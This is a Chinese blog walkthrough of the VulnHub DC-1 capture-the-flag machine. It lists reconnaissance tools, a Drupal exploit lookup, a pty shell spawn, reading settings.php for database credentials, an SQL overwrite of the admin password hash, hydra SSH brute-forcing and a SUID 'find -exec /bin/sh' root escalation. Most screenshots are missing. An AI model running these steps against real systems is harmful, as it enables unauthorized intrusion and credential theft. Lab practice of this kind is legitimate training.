vulnhub-DC1靶机

主机发现

arp-scan -l //或者netdiscover找到对应主机

在这arp里插入图片描述

nmap

在这里插入图片描述

80端口

在这里插入图片描述

whatweb

在这里插入图片描述

robots.txt

在这里插入图片描述

dirsearch目录扫描

在这里插入图片描述
在这里插入图片描述

msf或者searchsploit或

https://www.exploit-db.com/
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

交互shell 拿到flag1

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

提示查看CMS配置文件(百度搜索路径)拿flag2

cat /var/www/sites/default/settings.php

在这里插入图片描述
在这里插入图片描述

获取mysql账号密码 登录后查表

在这里插入图片描述
在这里插入图片描述
密码加密,找到加密脚本
在这里插入图片描述
利用PHP+加密脚本+密码(用加密后的密码替换已存在用户的密码)

php /var/www/scripts/password-hash.sh 123456

在这里插入图片描述

update users set pass='$S$DQ7XxSb7EkVStR52Y0e4KNok54.i1lt0oJXBMfFGD/VU1iZ0nKWZ' where name="admin";

登录成功 拿到flag3

在这里插入图片描述
在这里插入图片描述

根据提示需要提权

在这里插入图片描述

hydra爆破ssh

在这里插入图片描述

登录后拿flag4

在这里插入图片描述

## suid提取 拿最后一个flag

find / -perm -u=s -type f 2>/dev/null
find /etc/passwd -exec whoami \;
find /etc/passwd -exec "/bin/sh" \;

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值